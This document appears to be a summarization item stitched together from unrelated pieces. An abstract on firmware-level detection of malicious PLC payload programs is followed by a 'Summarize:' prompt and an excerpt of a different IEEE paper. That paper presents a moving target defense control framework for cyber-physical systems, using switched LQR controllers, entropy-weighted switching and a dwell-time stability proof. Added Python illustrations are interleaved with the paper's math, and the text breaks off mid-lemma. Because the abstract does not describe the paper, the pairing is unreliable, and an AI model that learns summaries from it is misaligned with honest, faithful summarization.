Programmable logic controllers (PLCs) play critical roles in industrial control systems (ICS). Providing hardware peripherals and firmware support for control programs (i.e., a PLC's payload) written in languages such as ladder logic, PLCs directly receive sensor readings and control ICS physical processes. An attacker with access to PLC development software (e.g., by compromising an engineering workstation) can modify the payload program and cause severe physical damage to the ICS. To protect critical ICS infrastructure, we propose to model the runtime behaviors of the legitimate PLC payload program and use runtime behavior monitoring in the PLC firmware to detect payload attacks. By monitoring the I/O access patterns, the network access patterns, as well as payload program timing characteristics, our proposed firmware-level detection mechanism can detect abnormal runtime behaviors of a malicious PLC payload. Using our proof-of-concept implementation, we evaluate the memory and execution time overhead of implementing our proposed method and find that it is feasible to incorporate our method into existing PLC firmware. In addition, our evaluation results show that a wide variety of payload attacks can be effectively detected by our proposed approach. The proposed firmware-level payload attack detection scheme complements existing bump-in-the-wire solutions (e.g., external temporal-logic-based model checkers) in that it can detect payload attacks that violate real-time requirements of ICS operations and does not require any additional apparatus.
|
Summarize:
Index Terms: Cyber-physical systems (CPSs), entropy, moving target and proactive defense, reactive defense, security.

I. INTRODUCTION
CYBER-PHYSICAL systems (CPSs) are complex platforms comprised of a physical layer, containing sensing and actuating devices, as well as communication and computational layers [1]. Such systems can be found in a number of areas ranging from military to civilian applications, namely healthcare and medicine [2], smart grids [3], [4], and transportation [5]. Due to the complex, and often large-scale, nature of CPSs, there is a plethora of attack angles that can be exploited by potential malicious agents/components. Numerous attacks on CPSs have been reported, e.g., the Stuxnet virus, a malicious computer worm targeting programmable logic controllers [6], or the attack on the Maroochy water services in Australia [7]. Also, more complex attacks have been reported, e.g., the simultaneous communication jamming and GPS spoofing of a military U.S. drone [8].

Manuscript received October 25, 2018; revised March 19, 2019; accepted April 28, 2019. Date of publication May 9, 2019; date of current version February 27, 2020. This work was supported in part by ONR Minerva under Grant N00014-18-1-2160, in part by the NSF CAREER under Grant CPS-1851588, in part by the Army Research Office (ARO) under Grant W911NF-19-1-0270, and in part by the Department of Energy under Grant DE-EE0008453. Recommended by Associate Editor Prof. H. Lin. (Corresponding author: Aris Kanellopoulos.) The authors are with the Daniel Guggenheim School of Aerospace Engineering, Georgia Institute of Technology, Atlanta, GA 30332 USA (e-mail: ariskan@gatech.edu; kyriakos@gatech.edu). Color versions of one or more of the figures in this paper are available online at http://ieeexplore.ieee.org. Digital Object Identifier 10.1109/TAC.2019.2915746
In order to ensure the integration of CPSs in our society, there is a need for robust defense mechanisms to counteract such malicious attacks. Moving target defense (MTD) [9] is a defense paradigm which aims to minimize the inherent advantage the attacker has over the defender. While the security measures employed by the system's defender have to monitor all the vulnerable components at all times and mitigate against all kinds of attack approaches, the attacker herself may need to bypass those defenses only once. Moreover, most CPSs operate statically with respect to their structure, goals, and constraints. Such vulnerabilities offer a persistent attacker the necessary time to exploit the system and develop appropriate strategies. MTD protocols aim to tackle this asymmetry by developing mechanisms that continually and unpredictably change the parameters of the system. Such unpredictability has three goals: to increase the cost of attacking; to limit the exposure of vulnerable components; and to deceive the opponent.

A. Related Work
The work in [10] questions the adequacy of security approaches that operate only in the computational layer, such as encryption algorithms. Therefore, extensive research has been conducted on the behavior and security of complex CPSs from a control-theoretic standpoint [11]-[13]. Furthermore, by leveraging models that are common in control theory, such as dynamical systems, we are able to better exploit the interconnection between the input and the output of a given system, which is often leveraged in CPS attacks. This has been addressed in [14] and is a valuable tool in defending against attacks such as drone spoofing. Among the different design approaches, optimal control and game theory [15] have emerged as important frameworks due to their ability to satisfy user-defined performances in the presence of cooperating and noncooperating agents.
Mathematically, optimal feedback policies are computed by solving the so-called Hamilton-Jacobi-Bellman (HJB) equation. In [16], security problems are formulated as zero-sum games between attacking and defending agents. In [17], a graphical game is solved on a complex multiagent network under persistent adversaries.

[0018-9286 © 2019 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. See https://www.ieee.org/publications/rights/index.html for more information. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11, 2025 at 16:45:13 UTC from IEEE Xplore. Restrictions apply. 1030 IEEE TRANSACTIONS ON AUTOMATIC CONTROL, VOL. 65, NO. 3, MARCH 2020]

These approaches seek to mitigate the attacker's influence rather than dissuade her from attacking. Theodorakopoulos and Baras [18] defined trust metrics to analyze the interconnections between the agents of a network. The research on MTD has mostly focused on its application to computer networks [19]-[21]. In [22], the authors apply the principles of MTD to constantly rotating Internet Protocol version 6 addresses. In [23], a proactive defense strategy was formulated to deceive an attacker targeting nodes in a wireless network. In the context of CPSs, those approaches can be employed in the computational and communication layers of the system. In this paper, we leverage control-theoretic tools to achieve a system-wide proactive and reactive defense that, to the best of our knowledge, has not been addressed before. A more formalized approach to MTD was introduced in [24], leading to an MTD entropy hypothesis framework that is generally applicable. In [25], a multilayer zero-sum game was formulated between an attacker trying to maximize the damage to the system and a defender randomizing over different configurations of the system, without considering the continuous-time dynamics due to the physics of the system.
An MTD approach was used to enlarge the dimension of the state space in [26] for the purposes of attack detection, rather than proactive defense based on an unpredictability measure. Vamvoudakis et al. [27] focused on the estimation problem of a binary variable in a network of sensors under Byzantine attacks, with no consideration of the system's dynamics. Fawzi et al. [28] showed that if the attacker is able to compromise fewer than half of the sensors, it is always possible to recover the state information. In order to relax this assumption, several switching-based schemes have been developed that, rather than guaranteeing robustness of estimation or operation under attack, opt to identify the attacked components and take them offline. Following this line of research, an attack detection filter and a passivity-based switching mechanism were introduced in [29] and [30], where explicit knowledge of the dynamics was required for the detection mechanism, and the switching structure was utilized in a reactive fashion, without the advantages offered by a proactive MTD mechanism.

1) Contribution: The contributions of this paper are fourfold. First, we model the attacker's effect as a time-varying and unknown, but integrable, degradation parameter. Second, multiple controllers and observers are designed for every admissible combination of actuators and sensors. Third, we use a probabilistic switching rule based on the entropy hypothesis to design a structure that offers proactive defense properties to the system. Moreover, we propose a performance evaluator based on the integral Bellman error of the closed-loop system to detect compromised actuators and sensors and remove them from the switching queue.
Finally, we show that the system under unpredictable switching, of either the actuating or the sensing components, has an asymptotically stable equilibrium point with a quantified dwell time and performance, and we present simulation results that highlight the operation of our approach as well as the tradeoff between optimality and security.

2) Structure: The remainder of this paper is structured as follows. Section II formulates the problem of defending a CPS from actuator and sensor attacks while also increasing the attacking surface to enhance uncertainty and unpredictability. In Section III, we focus on proactive and reactive defense against actuator attacks. Section IV extends the framework of Section III to incorporate a proactive and reactive defense framework against sensor attacks. Simulation results are shown in Section V. Finally, Section VI concludes and discusses future work.

3) Notation: The notation used here is standard. λ̄(A) is the maximum eigenvalue of the matrix A and λ(A) is its minimum eigenvalue. ‖·‖ denotes the Euclidean norm of a vector and the Frobenius norm of a matrix. The superscript ∗ is used to denote the optimal trajectories of a variable. (·)^T denotes the transpose of a matrix. ∇_x and ∂/∂x are used interchangeably and denote the partial derivative with respect to a vector x. The cardinality of a set, i.e., the number of elements contained in the set, is denoted by card(·). 2^A denotes the power set of a set A, i.e., the set containing all the subsets of A, including the empty set and A itself. Finally, supp(x) denotes the support of a vector, i.e., the number of its nonzero elements.

II.
PROBLEM FORMULATION

Consider the following linear time-invariant continuous-time system

ẋ(t) = A x(t) + B u_a(t),  t ≥ 0
y(t) = C_a(t) x(t)    (1)

where x(t) ∈ R^n is the state, u_a(t) ∈ R^m is the potentially attacked input of the system, y(t) ∈ R^p is the output, A ∈ R^{n×n} is the plant matrix, B ∈ R^{n×m} is the input matrix, and C_a(t) ∈ R^{p×n} is the potentially attacked output matrix. We can rewrite (1) as

ẋ(t) = A x(t) + Σ_{i=1}^{m} b_i u_i(t)
y_j(t) = c_j(t) x(t),  j ∈ {1, ..., p}

where b_i is a column vector corresponding to the i-th actuator, u_i is the value of the input signal associated with this actuator, and y_j is the output given by a specific sensor c_j corresponding to the j-th row of the output matrix. The potentially compromised control input of (1) will be of the following form

u_a(t) = Λ(t) u(t),  t ≥ 0    (2)

where Λ(t) = diag(λ_ii(t)), i ∈ {1, ..., m}, is a time-varying actuator attack parameter controlled by an adversary and u(t) ∈ R^m is the nonattacked control input. The output matrix of the system can be undermined by a signal Λ_s(t) as

C_a(t) = Λ_s(t) C,  t ≥ 0    (3)

where Λ_s(t) is a diagonal matrix controlled by the attacker and C ∈ R^{p×n} is the nonattacked output matrix.

Remark 1: Note that the focus of this paper is on the components of the CPS that can be modeled utilizing control-theoretic techniques. Although there are attack angles that can affect the software which implements the proposed intrusion detection algorithms, those lie beyond the scope of our research. It is assumed that the computing elements are equipped with appropriate security measures, such as encryption mechanisms [31].

[KANELLOPOULOS AND VAMVOUDAKIS: A MOVING TARGET DEFENSE CONTROL FRAMEWORK FOR CYBER-PHYSICAL SYSTEMS, p. 1031]
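The attack model in (2) and (3) can be illustrated numerically: the adversary scales actuator and sensor channels through the diagonal matrices Λ(t) and Λ_s(t). The channel sizes and the compromised channels below are assumed for illustration.

```python
import numpy as np

# Nonattacked control input and output matrix (assumed 3 actuators, 2 sensors).
u = np.array([1.0, -0.5, 2.0])
C = np.eye(2)

# Adversarial degradation at some fixed time t: actuator 2 is zeroed out and
# sensor 2 is scaled to half gain; not all channels are hit (Assumption 3).
Lam = np.diag([1.0, 0.0, 1.0])       # Lambda(t)
Lam_s = np.diag([1.0, 0.5])          # Lambda_s(t)

u_a = Lam @ u        # potentially attacked input, eq. (2)
C_a = Lam_s @ C      # potentially attacked output matrix, eq. (3)
```

A value of 1 on the diagonal leaves a channel untouched, matching the "not compromised" condition λ_ii = 1 in Assumption 2.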
On the other hand, our approach considers attacks that leverage the dual nature of CPSs; hence, we develop methods that take into account the cyber components that interact with the physics of the system, i.e., sensors and actuators. □

Assumption 1: In order to offer a greater degree of freedom for deception purposes and to mitigate the effect of potential attacks, we will consider systems with redundant actuating and sensing components. □

Assumption 2: We will assume that the system's actuators are not compromised over a time interval [t1, t2] if and only if λ_ii(τ) = 1, ∀i ∈ {1, ..., m}, ∀τ ∈ [t1, t2]. Similarly, we consider the sensors as secure if and only if λ^s_jj(τ) = 1, ∀j ∈ {1, ..., p}, ∀τ ∈ [t1, t2]. The signals (2) and (3) are assumed to be locally integrable over any closed time interval [t1, t2], 0 ≤ t1 < t2. □

Remark 2: The assumption on the local integrability of the adversarial signals allows us to take into account a variety of realistic attack scenarios, such as impulses and other discontinuous signals, or constant bias injection, which is locally, but not globally, integrable. The underlying restriction on the signal excludes attacks that have infinite value on a specific time interval, which is a practical assumption on the adversarial capabilities. □

Assumption 3: We will assume that the attacker is not able to compromise all of the actuators and sensors at once. Therefore, supp(Λ) < m and supp(Λ_s) < p. □

Remark 3: It should be noted that our formulation makes no assumptions on the structure, boundedness, or other Lipschitz continuity properties of the attacker's signal. Furthermore, attacks of the form (2) and (3), due to their time-varying nature, can describe a wide range of attacks, including additive and multiplicative attacks.
□

We are thus interested in designing a proactive and a reactive defense mechanism that will operate well in the absence of attackers, and will detect and mitigate attacks while guaranteeing closed-loop stability of the equilibrium point.

III. DEFENSE AGAINST ACTUATOR ATTACKS

We will initially focus our attention on the case of actuator attacks. We note that throughout this section, full state feedback is assumed. Let B denote the set containing the actuators of (1), described by the vectors b_i, i ∈ {1, ..., m}. The power set of B, denoted as 2^B, contains all possible combinations of the actuators acting on (1). Each of these combinations is expressed by an input matrix B_j, j ∈ {1, ..., 2^m}, whose columns are the appropriate vectors b_i. The set of candidate actuating modes B_c is defined as the set of actuator combinations that render system (1) fully controllable, i.e.,

B_c = { B_j ∈ 2^B : rank([B_j  A B_j  ···  A^{n-1} B_j]) = n }.    (4)

System (1), assuming full state feedback, with the actuating mode B_i can be rewritten as

ẋ = A x + B_i u_i,  i ∈ {1, ..., card(B_c)},  t ≥ 0.    (5)

Remark 4: Note that we do not require different actuating modes to share common actuators. Moreover, while a single actuating mechanism might be able to control a system, two different less potent mechanisms might need to work cooperatively to control the same system. All these modes belong to the set described in (4). □

A. Optimal Controllers Design
For each actuating operating mode B_i, i ∈ {1, ..., card(B_c)}, we denote the candidate control law as u_i(t). We are interested in deriving optimal controllers for each of these modes by utilizing well-known optimal control approaches [32]. Toward that, we are interested in solving the following optimization:

V*_i(x(t0)) = min_{u_i} ∫_{t0}^{∞} r_i(x, u_i) dτ ≡ min_{u_i} ∫_{t0}^{∞} (x^T Q_i x + u_i^T R_i u_i) dτ,  ∀x(t0)    (6)

given (5), where Q_i ⪰ 0, R_i ≻ 0, ∀i ∈ {1, ..., card(B_c)}.
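The construction of the candidate actuating-mode set B_c in (4) can be sketched by enumerating actuator subsets and testing the rank of the controllability matrix. The 2x2 double-integrator system below is an assumed example, not one from the paper.

```python
import numpy as np
from itertools import combinations

def controllable(A, Bj):
    """Full-rank test on the controllability matrix [Bj, A Bj, ..., A^(n-1) Bj]."""
    n = A.shape[0]
    ctrb = np.hstack([np.linalg.matrix_power(A, k) @ Bj for k in range(n)])
    return np.linalg.matrix_rank(ctrb) == n

def candidate_modes(A, B):
    """Enumerate actuator subsets and keep those that render (A, Bj) controllable."""
    m = B.shape[1]
    return [idx
            for r in range(1, m + 1)
            for idx in combinations(range(m), r)
            if controllable(A, B[:, list(idx)])]

A = np.array([[0.0, 1.0], [0.0, 0.0]])   # assumed double-integrator plant
B = np.array([[0.0, 1.0], [1.0, 0.0]])   # two redundant actuators
modes = candidate_modes(A, B)
```

Here actuator 0 alone controls the plant, actuator 1 alone does not, and the pair does; only the controllable subsets enter B_c.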
Assumption 4: We assume that each pair (A, Q_i) is detectable. □

The Hamiltonian associated with (5) and (6) is

H_i(x, u_i, ∇V_i) = ∇V_i^T (A x + B_i u_i) + x^T Q_i x + u_i^T R_i u_i,  ∀x, u_i

with V_i denoting the value function, not necessarily the optimal one. Applying the stationarity condition ∂H_i(x, u_i, ∇V_i)/∂u_i = 0 yields

u_i = -(1/2) R_i^{-1} B_i^T ∇V_i.    (7)

The optimal value functions V_i*(·) must satisfy the following HJB equation

x^T Q_i x + (∇V_i*)^T A x - (1/4)(∇V_i*)^T B_i R_i^{-1} B_i^T ∇V_i* = 0.    (8)

Since all the systems described by (5) are linear and the cost given by (6) is quadratic, all the value functions are quadratic in the state x, i.e., V_i*(x) = x^T P_i x, P_i ≻ 0. Substituting this expression into (8) and the resulting optimal value function into (7) yields the feedback controller with optimal gain K_i,

u*_i(x) = -K_i x := -R_i^{-1} B_i^T P_i x,  ∀x

where the P_i are the solutions to the following Riccati equations

A^T P_i + P_i A - P_i B_i R_i^{-1} B_i^T P_i + Q_i = 0.    (9)

We introduce K, the set containing all K_i, i ∈ {1, ..., m}, with the understanding that card(K) = card(B_c). For ease of exposition, with some abuse of notation, we will consider K_i to mean the optimal controller with this gain as well as its corresponding index.

Fact 1: Due to (4) and Assumption 4, for each B_i, the solution exists and is unique. □

Fact 2: Each K_i, with input given by (7), guarantees that (1) has an asymptotically stable equilibrium point. □

B. Switching-Based MTD Framework
We will now develop a framework to facilitate the deception of potential attackers based on the principles of MTD.

1) Maximization of Unpredictability: To formally define the switching law, we need to introduce a probability simplex p, which denotes the probability that each controller K_i is active.
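A sketch of computing the per-mode optimal gains K_i from the Riccati equation (9). Here the CARE is solved with a standard Hamiltonian-matrix construction using only NumPy (a dedicated solver such as SciPy's could equally be used); the double-integrator mode and identity weights are assumed examples.

```python
import numpy as np

def care_solve(A, B, Q, R):
    """Solve A'P + PA - P B R^{-1} B' P + Q = 0 via the stable invariant
    subspace of the Hamiltonian matrix (a standard CARE construction)."""
    n = A.shape[0]
    H = np.block([[A, -B @ np.linalg.inv(R) @ B.T],
                  [-Q, -A.T]])
    w, V = np.linalg.eig(H)
    stable = V[:, w.real < 0]            # eigenvectors of the n stable modes
    X1, X2 = stable[:n, :], stable[n:, :]
    return np.real(X2 @ np.linalg.inv(X1))

def lqr_gain(A, Bi, Qi, Ri):
    """Optimal gain K_i = R_i^{-1} B_i^T P_i for actuating mode B_i, eq. (9)."""
    P = care_solve(A, Bi, Qi, Ri)
    return np.linalg.solve(Ri, Bi.T @ P)

A = np.array([[0.0, 1.0], [0.0, 0.0]])   # assumed double-integrator mode
B1 = np.array([[0.0], [1.0]])
K1 = lqr_gain(A, B1, np.eye(2), np.array([[1.0]]))
```

For this example the CARE can be solved by hand, giving K1 = [1, sqrt(3)], and the closed-loop matrix A - B1 K1 is Hurwitz, consistent with Fact 2.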
To incorporate ideas from the framework of MTD, we propose a switching rule that optimizes over the minimum cost that each controller is able to attain, as well as an unpredictability term quantified by the information entropy of the switching probability simplex $p$. This way, we achieve the desired tradeoff between overall optimality and unpredictability. The use of information entropy is standard practice in MTD design [33].

Theorem 1: Suppose that (1) is controlled by $N = \operatorname{card}(K)$ candidate controllers with associated costs given by (6). Then, the probability $p_i^{\star}$ that each controller $K_i$ is active is given by

$$p_i^{\star} = \exp\left(-\frac{V_i^{\star}}{\epsilon} - 1 - \log\left(e^{-1}\sum_{j=1}^{N}e^{-V_j^{\star}/\epsilon}\right)\right) = \frac{e^{-V_i^{\star}/\epsilon}}{\sum_{j=1}^{N}e^{-V_j^{\star}/\epsilon}} \tag{10}$$

with $\epsilon \in \mathbb{R}^{+}$ denoting the weight on unpredictability during the optimization process.

Proof: We formulate the following optimization problem:

$$\min_{p}\left(V^{\star T}p - \epsilon H(p)\right) \quad \text{subject to: } \|p\|_1 = 1 \text{ and } p \succeq 0$$

where $V^{\star} := [V_1^{\star}\;\cdots\;V_N^{\star}]^{T} = [x(t_0)^{T}P_1x(t_0)\;\cdots\;x(t_0)^{T}P_Nx(t_0)]^{T}$ denotes a column vector containing the value function of each candidate controller, and $H(p) = -p^{T}\log(p)$ is the information entropy of the simplex.

Remark 5: The choice of this particular objective function allows us to combine the two required specifications. The linear term $V^{\star T}p$ penalizes deviations from the overall optimal controller, while the entropy term $H(p)$ penalizes the use of a single controller throughout the operation of the system. The result is a compromise specified by the optimization weight $\epsilon$. □

Furthermore, for the decision vector $p$ to constitute a probability simplex, we constrain it to the nonnegative orthant (i.e., $p_i \geq 0$, $\forall i \in \{1,\ldots,N\}$) and require its $\ell_1$ norm to satisfy $\|p\|_1 = \sum_{i=1}^{N}|p_i| = 1$.
The entropy of a probability distribution is a concave function [34]; therefore the cost index, being the sum of a linear function of the probability and the negative entropy, is convex. Thus, we can define the Lagrangian of the optimization problem as

$$L = V^{\star T}p - \epsilon H(p) + \lambda(\mathbf{1}^{T}p - 1) + \mu^{T}p = V^{\star T}p + \epsilon\, p^{T}\log(p) + \lambda(\mathbf{1}^{T}p - 1) + \mu^{T}p$$

where $\mathbf{1}$ denotes a vector of ones and $\lambda, \mu$ are the Karush-Kuhn-Tucker (KKT) multipliers. The KKT stationarity condition for the problem is

$$\nabla_{p}L = V^{\star} + \epsilon\mathbf{1} + \epsilon\log(p) + \lambda\mathbf{1} + \mu = 0$$

and the complementarity condition for the optimal solution $p^{\star}$ is $\mu^{\star T}p^{\star} = 0$. If there exists an $i$ for which $p_i = 0$, the term $\log(p_i)$ is undefined. Consequently, for the optimization problem to be feasible, one of the following two conditions must hold: 1) $\epsilon\log(p_i) = 0$, $\forall i$, i.e., $\epsilon = 0$ and $p^{\star} = [0_1,\ldots,1,\ldots,0_N]^{T}$, where the active controller $K_i$ is the one with the overall least cost; or 2) $\mu = 0$.

Consider now the nontrivial case, $\mu = 0$, which yields

$$\nabla_{p}L = V^{\star} + \epsilon\log(p) + \epsilon\mathbf{1} + \lambda\mathbf{1} = 0.$$

The $N$ equations, one per controller, are independent, leading to the following system of equations:

$$V_i^{\star} + \epsilon\log(p_i) + \epsilon + \lambda = 0, \quad \forall i \in \{1,\ldots,N\}.$$

Solving for the optimal probabilities $p_i^{\star}$ yields

$$p_i^{\star} = \exp\left(-\frac{V_i^{\star}}{\epsilon} - \frac{\lambda}{\epsilon} - 1\right), \quad \forall i \in \{1,\ldots,N\}. \tag{11}$$

Taking into account that $\|p\|_1 = 1$, i.e., $\sum_{i=1}^{N}p_i^{\star} = \sum_{i=1}^{N}\exp\left(-\frac{V_i^{\star}}{\epsilon} - \frac{\lambda}{\epsilon} - 1\right) = 1$, and solving for $\lambda^{\star}$ yields

$$\lambda^{\star} = \epsilon\log\left(e^{-1}\sum_{i=1}^{N}e^{-V_i^{\star}/\epsilon}\right). \tag{12}$$

Substituting (12) into (11) provides the required result. ■

2) Switching-Based MTD Scheme: In order to analyze the behavior of the system under the proposed MTD framework, we formulate a switched system consisting of the different operating modes. First, we introduce the switching signal $\sigma(t) = i$, $i \in \{1,\ldots,\operatorname{card}(K)\}$, which denotes the active controller as a function of time.
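Numerically, the closed form (10) is an entropy-weighted softmax over the per-mode costs; a small sketch (the cost values are illustrative only):

```python
import numpy as np

def mtd_probabilities(V_star, eps):
    """Closed form (10): an entropy-regularised softmax over the per-mode
    optimal costs V_i* = x(t0)^T P_i x(t0).  Larger eps weights
    unpredictability (toward uniform); eps -> 0 concentrates on the
    overall optimal controller."""
    z = -np.asarray(V_star, dtype=float) / eps
    z -= z.max()                  # shift for numerical stability
    p = np.exp(z)
    return p / p.sum()

p = mtd_probabilities([1.0, 2.0, 4.0], eps=1.0)  # illustrative costs V_i*
```

Cheaper modes get larger activation probability, but no mode's probability is driven to zero for $\epsilon > 0$, which is exactly what keeps the switching unpredictable.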
This way, the switched system is

$$\dot{x}(t) = A_{\sigma(t)}x(t) \tag{13}$$

where $A_{\sigma(t)} := A - B_{\sigma(t)}R_{\sigma(t)}^{-1}B_{\sigma(t)}^{T}P_{\sigma(t)}$ denotes the closed-loop subsystem with the controller $K_{\sigma(t)}$ active.

Remark 6: Since the actual switching sequence differs under the designer's choice of unpredictability, we constrain the switching signal to have a predefined average dwell time. This way, the stability of the overall system is independent of the result of the optimization. Intuitively, as initially shown in [35], a system with stable subsystems is stable if the switching is slow enough in an average sense. □

Definition 1: A switching signal has an average dwell time $\tau_D$ if over any time interval $[t,T]$, $T \geq t$, the number of switches $S(T,t)$ is bounded above as

$$S(T,t) \leq S_0 + \frac{T-t}{\tau_D}$$

KANELLOPOULOS AND VAMVOUDAKIS: A MOVING TARGET DEFENSE CONTROL FRAMEWORK FOR CYBER-PHYSICAL SYSTEMS 1033

where $S_0$ is an arbitrary chatter bound and $\tau_D$ is the dwell time. □

Theorem 2: Consider system (1) in the absence of attacks. The switched system defined by the piecewise continuous switching signal $\sigma(t) = i$, $i \in \{1,\ldots,\operatorname{card}(K)\}$, with active controller $K_i$ given by (7) and continuous flow given by (5), has an asymptotically stable equilibrium point for every switching signal $\sigma(t)$ if the average dwell time is bounded by

$$\tau_D > \frac{\log\left(\max_{q,p\in\{1,\ldots,\operatorname{card}(K)\}}\frac{\bar{\lambda}(P_p)}{\underline{\lambda}(P_q)}\right)}{\min_{p\in\{1,\ldots,\operatorname{card}(K)\}}\frac{\underline{\lambda}\left(Q_p + P_pB_pR_p^{-1}B_p^{T}P_p\right)}{\bar{\lambda}(P_p)}} \tag{14}$$

with an arbitrary chatter bound $S_0 > 0$.

Proof: For each $i \in \{1,\ldots,\operatorname{card}(K)\}$, following [36], we choose the Lyapunov function for each subsystem as $V_i(x) = x^{T}P_i x$, $\forall x$, where $P_i$ is the solution to the Riccati equation (9). These Lyapunov functions are positive definite and radially unbounded for all $x$.
By the Rayleigh-Ritz inequality for symmetric matrices,

$$\underline{\lambda}(P_i)\|x\|^2 \leq x^{T}P_i x = V_i(x) \leq \bar{\lambda}(P_i)\|x\|^2. \tag{15}$$

The time derivative of $V_i(x)$ along the trajectories of the corresponding subsystem is

$$\dot{V}_i(x) = \dot{x}^{T}P_i x + x^{T}P_i\dot{x} = x^{T}\left((A - B_iR_i^{-1}B_i^{T}P_i)^{T}P_i + P_i(A - B_iR_i^{-1}B_i^{T}P_i)\right)x = x^{T}\left(A^{T}P_i + P_iA - 2P_iB_iR_i^{-1}B_i^{T}P_i\right)x.$$

Taking into account (9) and denoting $\bar{H}_i := Q_i + P_iB_iR_i^{-1}B_i^{T}P_i \succ 0$, $\forall i \in \{1,\ldots,\operatorname{card}(K)\}$, yields $\dot{V}_i(x) = -x^{T}\bar{H}_i x$. Consequently, it holds that

$$\dot{V}_i(x) \leq -\underline{\lambda}(\bar{H}_i)\|x\|^2. \tag{16}$$

Combining (16) with (15), and noting that $V_i(x) \leq \bar{\lambda}(P_i)\|x\|^2$ implies $\|x\|^2 \geq V_i(x)/\bar{\lambda}(P_i)$, yields

$$\dot{V}_i(x) \leq -\frac{\underline{\lambda}(\bar{H}_i)}{\bar{\lambda}(P_i)}V_i(x). \tag{17}$$

For the inequality to hold for arbitrary modes, we write

$$\dot{V}_i(x) \leq -\lambda_0 V_i(x), \quad \lambda_0 := \min_{i\in\{1,\ldots,\operatorname{card}(K)\}}\frac{\underline{\lambda}(\bar{H}_i)}{\bar{\lambda}(P_i)}.$$

Following similar arguments, we can show that for every pair $p,q \in \{1,\ldots,\operatorname{card}(K)\}$ it holds that $V_p(x) \leq \frac{\bar{\lambda}(P_p)}{\underline{\lambda}(P_q)}V_q(x)$, and for the inequality to hold for arbitrary pairs of modes we further write

$$V_p(x) \leq \mu V_q(x), \quad \mu := \max_{p,q\in\{1,\ldots,\operatorname{card}(K)\}}\frac{\bar{\lambda}(P_p)}{\underline{\lambda}(P_q)}.$$

Without loss of generality, we consider the switched system evolving on the time interval $[0,t_f]$. Denote by $S(t_f,0)$ the number of switches over this interval, taking place at times $t_i$, $i \in [0,S(t_f,0)]$, with $t_i < t_{i+1}$. The active mode is the same over any interval $[t_i,t_{i+1})$, i.e., the switching signal $\sigma(t) = i$ is piecewise constant. Define the function

$$W(t) = e^{\lambda_0 t}V_{\sigma(t)}(x(t)). \tag{18}$$

Along the solutions of the switched system (13) over an interval $t \in [t_i,t_{i+1})$, the time derivative of (18) is $\dot{W} = \lambda_0 W + e^{\lambda_0 t}\dot{V}_{\sigma(t)}(x(t))$, which is nonpositive due to (17). Consequently, the function $W(t)$ is nonincreasing for all $t \in [t_i,t_{i+1})$.
At the jump instants $t_i$, one has

$$W(t_{i+1}) = e^{\lambda_0 t_{i+1}}V_{\sigma(t_{i+1})}(x(t_{i+1})) \leq \mu\, e^{\lambda_0 t_{i+1}}V_{\sigma(t_i)}(x(t_{i+1})) \implies W(t_{i+1}) \leq \mu\, e^{\lambda_0 t_i}V_{\sigma(t_i)}(x(t_i)) = \mu W(t_i) \tag{19}$$

where we used the nonincreasing property of $W(t)$ within each interval. Over the whole interval $[0,t_f]$, iterating (19) over the $S(t_f,0)$ discontinuities yields

$$W(t_f) \leq \mu^{S(t_f,0)}W(0) \implies e^{\lambda_0 t_f}V_{\sigma(t_f)}(x(t_f)) \leq \mu^{S(t_f,0)}e^{0}V_{\sigma(0)}(x(0)) \implies V_{\sigma(t_f)}(x(t_f)) \leq \mu^{S(t_f,0)}e^{-\lambda_0 t_f}V_{\sigma(0)}(x(0)). \tag{20}$$

Using Definition 1, we can now rewrite (20) as

$$V_{\sigma(t_f)}(x(t_f)) \leq e^{S_0\log\mu}\,e^{\left(\frac{\log\mu}{\tau_D} - \lambda_0\right)t_f}\,V_{\sigma(0)}(x(0)).$$

It is clear that choosing $\tau_D$ in a way that satisfies the bound (14) makes the exponent negative, so that $V_{\sigma(t_f)}(x(t_f)) \to 0$ as $t_f \to \infty$. Due to (15), we can conclude that $x(t_f) \to 0$, which is the required result. ■

C. Integral Bellman-Based Intrusion Detection Mechanism

In this section, an intrusion detection mechanism is designed to identify the potentially corrupted controllers belonging to the set $K$. The attack detection signal relies on the optimality property as well as on data measured along the possibly corrupted trajectories of the system. Based on a sampling mechanism, we denote the measurements of the state at the sampling instants by $x_c(t)$ and define the functions $V_i(\cdot) := x_c^{T}P_i x_c$, $i \in \{1,\ldots,\operatorname{card}(K)\}$. Intuitively, we obtain a sampled version of the optimal value function along the system's real, and potentially compromised, trajectories.
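The dwell-time bound (14) of Theorem 2 depends only on the Riccati solutions of the candidate modes, so it can be evaluated offline. A sketch under the same toy assumptions as above (hypothetical modes, $Q$ shared across modes):

```python
import numpy as np
from scipy.linalg import solve_continuous_are

def dwell_time_bound(A, B_modes, Q, R_modes):
    """Evaluate the average dwell-time bound (14):
    tau_D > log(max_{p,q} lmax(P_p)/lmin(P_q))
            / min_p [ lmin(Q + P_p B_p R_p^{-1} B_p^T P_p) / lmax(P_p) ]."""
    Ps = [solve_continuous_are(A, Bp, Q, Rp)
          for Bp, Rp in zip(B_modes, R_modes)]
    lmax = np.array([np.linalg.eigvalsh(P).max() for P in Ps])
    lmin = np.array([np.linalg.eigvalsh(P).min() for P in Ps])
    mu = lmax.max() / lmin.min()          # worst-case jump of V at a switch
    rates = [np.linalg.eigvalsh(Q + P @ Bp @ np.linalg.solve(Rp, Bp.T) @ P).min()
             / np.linalg.eigvalsh(P).max()
             for P, Bp, Rp in zip(Ps, B_modes, R_modes)]
    return np.log(mu) / min(rates), Ps

# Hypothetical two-mode double integrator.
A = np.array([[0.0, 1.0], [0.0, 0.0]])
B_modes = [np.array([[0.0], [1.0]]), np.array([[1.0], [0.5]])]
R_modes = [np.eye(1), np.eye(1)]
Q = np.eye(2)
tau_D, Ps = dwell_time_bound(A, B_modes, Q, R_modes)
```

Any average dwell time larger than the returned value keeps the switched closed loop asymptotically stable regardless of the randomized switching sequence.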
Lemma 1: The error between the optimal trajectory and the real (potentially attacked) trajectory under an integrable attack signal $\Xi(t)$ over a closed time interval $[t_0,t_1]$ is bounded as

$$\|e_x(t)\| \leq \beta_i(t,\Xi)\|x(t_0)\|$$

where

$$\beta_i(t,\Xi) = \int_{t_0}^{t}\alpha_i(\tau)\|I-\Xi(\tau)\|\,e^{\int_{t_0}^{\tau}\alpha_i(s)\|I-\Xi(s)\|\,ds}\,d\tau$$

and $\alpha_i(\tau) = \|e^{(A-B_iK_i)(\tau-t_0)}\|\,\|B_i\|\,\|K_i\|$, with $K_i = R_i^{-1}B_i^{T}P_i$.

